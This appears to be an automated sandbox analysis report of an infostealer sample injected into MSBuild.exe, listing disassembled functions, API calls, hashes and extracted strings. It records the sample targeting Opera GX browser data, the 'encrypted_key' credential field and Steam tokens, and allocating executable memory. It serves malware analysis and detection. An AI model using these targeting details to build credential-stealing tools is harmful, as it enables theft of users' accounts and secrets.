                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_MSBuild.jbxd
                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: CreateObjectSingleSleepThreadWait
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 4198075804-0
                                                                                                                                                                                                                      • Opcode ID: a1dc13e99dd204c5a3461b4ea6d28ee21b2c0be54f1f4843eeff7d6218642cdc
                                                                                                                                                                                                                      • Instruction ID: 5b264aedade7dddb2649676fe5ff4aca135c6ea40ecc08e40dc523016e9b5da3
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: a1dc13e99dd204c5a3461b4ea6d28ee21b2c0be54f1f4843eeff7d6218642cdc
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: EC213B72900218ABCF14EF96E9459DE7BB9FF40358F11512BF904A3151D738EA86CF98
                                                                                                                                                                                                                      Function 00412446 Relevance: 4.5, APIs: 3, Instructions: 41fileCOMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000,?,?,?,?,00414A8D), ref: 00412460
                                                                                                                                                                                                                      • WriteFile.KERNEL32(00000000,00000000,00414A8D,00414A8D,00000000,?,?,?,00414A8D), ref: 00412487
                                                                                                                                                                                                                      • CloseHandle.KERNEL32(00000000,?,?,?,00414A8D), ref: 0041249E
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000004.00000002.2190030987.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_MSBuild.jbxd
                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: File$CloseCreateHandleWrite
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 1065093856-0
                                                                                                                                                                                                                      • Opcode ID: 618600667c8334e05266c7920bfcba6b014638909509334c775888355d968c7c
                                                                                                                                                                                                                      • Instruction ID: a587d297adf89e60fa6946fdd7da6f666782c0f167f87b21f29bcfda1cd19bad
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 618600667c8334e05266c7920bfcba6b014638909509334c775888355d968c7c
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 84F02471200118BFEF01AFA4DD8AFEF379CDF053A8F000022F951D6190D3A58D9157A5
                                                                                                                                                                                                                      Function 6C883060 Relevance: 4.5, APIs: 3, Instructions: 36timeCOMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • ?Startup@TimeStamp@mozilla@@SAXXZ.MOZGLUE ref: 6C883095
                                                                                                                                                                                                                        • Part of subcall function 6C8835A0: InitializeCriticalSectionAndSpinCount.KERNEL32(6C90F688,00001000), ref: 6C8835D5
                                                                                                                                                                                                                        • Part of subcall function 6C8835A0: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_TIMESTAMP_MODE), ref: 6C8835E0
                                                                                                                                                                                                                        • Part of subcall function 6C8835A0: QueryPerformanceFrequency.KERNEL32(?), ref: 6C8835FD
                                                                                                                                                                                                                        • Part of subcall function 6C8835A0: _strnicmp.API-MS-WIN-CRT-STRING-L1-1-0(?,GenuntelineI,0000000C), ref: 6C88363F
                                                                                                                                                                                                                        • Part of subcall function 6C8835A0: GetSystemTimeAdjustment.KERNEL32(?,?,?), ref: 6C88369F
                                                                                                                                                                                                                        • Part of subcall function 6C8835A0: __aulldiv.LIBCMT ref: 6C8836E4
                                                                                                                                                                                                                      • ?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001), ref: 6C88309F
                                                                                                                                                                                                                        • Part of subcall function 6C8A5B50: QueryPerformanceCounter.KERNEL32(?,?,?,?,6C8A56EE,?,00000001), ref: 6C8A5B85
                                                                                                                                                                                                                        • Part of subcall function 6C8A5B50: EnterCriticalSection.KERNEL32(6C90F688,?,?,?,6C8A56EE,?,00000001), ref: 6C8A5B90
                                                                                                                                                                                                                        • Part of subcall function 6C8A5B50: LeaveCriticalSection.KERNEL32(6C90F688,?,?,?,6C8A56EE,?,00000001), ref: 6C8A5BD8
                                                                                                                                                                                                                        • Part of subcall function 6C8A5B50: GetTickCount64.KERNEL32 ref: 6C8A5BE4
                                                                                                                                                                                                                      • ?InitializeUptime@mozilla@@YAXXZ.MOZGLUE ref: 6C8830BE
                                                                                                                                                                                                                        • Part of subcall function 6C8830F0: QueryUnbiasedInterruptTime.KERNEL32 ref: 6C883127
                                                                                                                                                                                                                        • Part of subcall function 6C8830F0: __aulldiv.LIBCMT ref: 6C883140
                                                                                                                                                                                                                        • Part of subcall function 6C8BAB2A: __onexit.LIBCMT ref: 6C8BAB30
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000004.00000002.2230392944.000000006C881000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C880000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230369472.000000006C880000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230729954.000000006C8FD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230783588.000000006C90E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230808938.000000006C912000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_6c880000_MSBuild.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: Time$CriticalQuerySection$InitializePerformanceStamp@mozilla@@__aulldiv$AdjustmentCountCount64CounterEnterFrequencyInterruptLeaveNow@SpinStartup@SystemTickUnbiasedUptime@mozilla@@V12@___onexit_strnicmpgetenv
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 4291168024-0
                                                                                                                                                                                                                      • Opcode ID: f3d554163b6c2a1b6217e3032b815530b6fc04b82517ad5bd16606df68c58a79
                                                                                                                                                                                                                      • Instruction ID: 9bd2b2b631d20e72c52aedc3bfde6b330efa03bd0f48dd4c1d91f358e00ed02b
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: f3d554163b6c2a1b6217e3032b815530b6fc04b82517ad5bd16606df68c58a79
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 33F0F912F28B4C97CB20DF7889411EAB370AF6B218F601B3DE84463651FB3067D88385
                                                                                                                                                                                                                      Function 00410C85 Relevance: 4.5, APIs: 3, Instructions: 22memoryCOMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00401385), ref: 00410C91
                                                                                                                                                                                                                      • HeapAlloc.KERNEL32(00000000,?,?,?,00401385), ref: 00410C98
                                                                                                                                                                                                                      • GetComputerNameA.KERNEL32(00000000,00401385), ref: 00410CAC
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000004.00000002.2190030987.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_MSBuild.jbxd
                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: Heap$AllocComputerNameProcess
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 4203777966-0
                                                                                                                                                                                                                      • Opcode ID: 223c93d772ac102104f3d80f3225d4df8625dfe3dc4c13cc38eb63403da552c2
                                                                                                                                                                                                                      • Instruction ID: 4a48e0897f6a5e53a67cc5d7e0c14adbc6ce47083a4b6c26751418be0e4428b5
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 223c93d772ac102104f3d80f3225d4df8625dfe3dc4c13cc38eb63403da552c2
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 2DE08CB1200204BBD7449BD9AC8DF8A76BCDB84715F100226F605D6250EAB4C9848B68
                                                                                                                                                                                                                      Function 0040C95C Relevance: 3.8, APIs: 1, Strings: 1, Instructions: 286COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                        • Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D
                                                                                                                                                                                                                      • StrCmpCA.SHLWAPI(?,Opera GX,00436853,0043684B,?,?,?), ref: 0040C98F
                                                                                                                                                                                                                        • Part of subcall function 00411DBC: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,?), ref: 00411DFD
                                                                                                                                                                                                                        • Part of subcall function 004105C7: lstrcpyA.KERNEL32(00000000,?,0000000C,004175E9,004366DA), ref: 004105F5
                                                                                                                                                                                                                        • Part of subcall function 004105C7: lstrcatA.KERNEL32(?,?), ref: 004105FF
                                                                                                                                                                                                                        • Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004170BA,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 004105BD
                                                                                                                                                                                                                        • Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 0041061D
                                                                                                                                                                                                                        • Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410645
                                                                                                                                                                                                                        • Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410650
                                                                                                                                                                                                                        • Part of subcall function 00410519: lstrcpyA.KERNEL32(00000000,?,?,00401D07,?,00417621), ref: 00410538
                                                                                                                                                                                                                        • Part of subcall function 00411D92: GetFileAttributesA.KERNEL32(?,?,?,0040DA7F,?,?,?), ref: 00411D99
                                                                                                                                                                                                                        • Part of subcall function 0040819F: StrStrA.SHLWAPI(00000000,"encrypted_key":",?,?,?,?,?,?,0040CC90,?,?), ref: 004081E5
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000004.00000002.2190030987.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_MSBuild.jbxd
                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: lstrcpy$lstrcat$AttributesFileFolderPathlstrlen
                                                                                                                                                                                                                      • String ID: Opera GX
                                                                                                                                                                                                                      • API String ID: 1719890681-3280151751
                                                                                                                                                                                                                      • Opcode ID: 60c01dc8b37e4b84b74df1fa8103c1199fcfef80998ad79c597a27a207442b16
                                                                                                                                                                                                                      • Instruction ID: 2f838092edd703084741f82f1e37e62fc4a331bb811b3281c0e98dae42c078f1
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 60c01dc8b37e4b84b74df1fa8103c1199fcfef80998ad79c597a27a207442b16
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 3FB1FD7294011DABCF10FFA6DE425CD7775AF04308F51013AF904771A1DBB8AE8A8B99
                                                                                                                                                                                                                      Function 00407B0B Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 63memoryCOMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • VirtualProtect.KERNEL32(?,?,00000002,00000002,?,?,?,?,00407C56,?), ref: 00407B8A
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000004.00000002.2190030987.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_MSBuild.jbxd
                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: ProtectVirtual
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 544645111-3916222277
                                                                                                                                                                                                                      • Opcode ID: 12037c8daa12d7fcab0069a5037541411d8429e4b00213a69a2087787070dd30
                                                                                                                                                                                                                      • Instruction ID: 7cbd0eafb3405f1822ca0081af98c781be9845726f70e814ec0c9ffce599534c
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 12037c8daa12d7fcab0069a5037541411d8429e4b00213a69a2087787070dd30
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 14119D71908509ABDB20DF94C684BAAB3F4FB00348F144466D641E32C0D33CBE85D75B
                                                                                                                                                                                                                      Function 00416FB7 Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 45stringCOMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                        • Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D
                                                                                                                                                                                                                        • Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 0041061D
                                                                                                                                                                                                                        • Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410645
                                                                                                                                                                                                                        • Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410650
                                                                                                                                                                                                                        • Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004170BA,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 004105BD
                                                                                                                                                                                                                      • lstrlenA.KERNEL32(?), ref: 00416FFE
                                                                                                                                                                                                                        • Part of subcall function 00416E97: CreateThread.KERNEL32(00000000,00000000,00416DC6,?,00000000,00000000), ref: 00416F36
                                                                                                                                                                                                                        • Part of subcall function 00416E97: WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 00416F3E
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      • Soft\Steam\steam_tokens.txt, xrefs: 0041700E
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000004.00000002.2190030987.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_MSBuild.jbxd
                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: lstrcpy$lstrlen$CreateObjectSingleThreadWaitlstrcat
                                                                                                                                                                                                                      • String ID: Soft\Steam\steam_tokens.txt
                                                                                                                                                                                                                      • API String ID: 502913869-3507145866
                                                                                                                                                                                                                      • Opcode ID: 212f9d999e26f76b20966994f13319e6fa11f2a26421251c526ef5ee57093a08
                                                                                                                                                                                                                      • Instruction ID: 5852b7b14dd5e00f67c9332eee82213ee25541dc93f475b49d312086d811fdd4
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 212f9d999e26f76b20966994f13319e6fa11f2a26421251c526ef5ee57093a08
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: A5012571E4010967CF00FBE6DD478CD7B74AF04358F514176FA0077152D779AA8A86D5
                                                                                                                                                                                                                      Function 00411E1F Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 32memoryCOMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • LocalAlloc.KERNEL32(00000040,00000001,?,?,?,00416931,?), ref: 00411E37
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000004.00000002.2190030987.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_MSBuild.jbxd
                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: AllocLocal
                                                                                                                                                                                                                      • String ID: 1iA
                                                                                                                                                                                                                      • API String ID: 3494564517-1863120733
                                                                                                                                                                                                                      • Opcode ID: ab387d88e84e58f7ee09dd024291177f022f73d374550d18fdbda7562f7ae9e7
                                                                                                                                                                                                                      • Instruction ID: dc66f3ebc75c526b8f29ca666c763a1a9938aadc44e5483d7dab6bcf02b3e8fe
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: ab387d88e84e58f7ee09dd024291177f022f73d374550d18fdbda7562f7ae9e7
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 08E02B3AA41B201FC7724BAA8804AB7BB5A9FC2F61B18412BDF49CB324D535CC4182E4
                                                                                                                                                                                                                      Function 004077F8 Relevance: 2.6, APIs: 2, Instructions: 63memoryCOMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • VirtualAlloc.KERNEL32(?,?,00003000,00000040,00000000,?,?,?,00407C18,?,?), ref: 0040784A
                                                                                                                                                                                                                      • VirtualAlloc.KERNEL32(00000000,?,00003000,00000040), ref: 00407874
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000004.00000002.2190030987.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_MSBuild.jbxd
                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: AllocVirtual
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 4275171209-0
                                                                                                                                                                                                                      • Opcode ID: c062e49b8eac24d7b45a027ae12e9eff25198202155d78bc8260cd663ae55519
                                                                                                                                                                                                                      • Instruction ID: 58502b0b00c881bab5b754626ee9ce4ad9b10c36d9ff74d45ae59ae86afa5875
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: c062e49b8eac24d7b45a027ae12e9eff25198202155d78bc8260cd663ae55519
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: C311B472A44705ABC724CFB8C989B9BB7F4EB40714F24483EE54AE7390E274B940C715
                                                                                                                                                                                                                      Function 0041CBB8 Relevance: 2.5, APIs: 2, Instructions: 39COMMON
                                                                                                                                                                                                                      Download Yara Rule
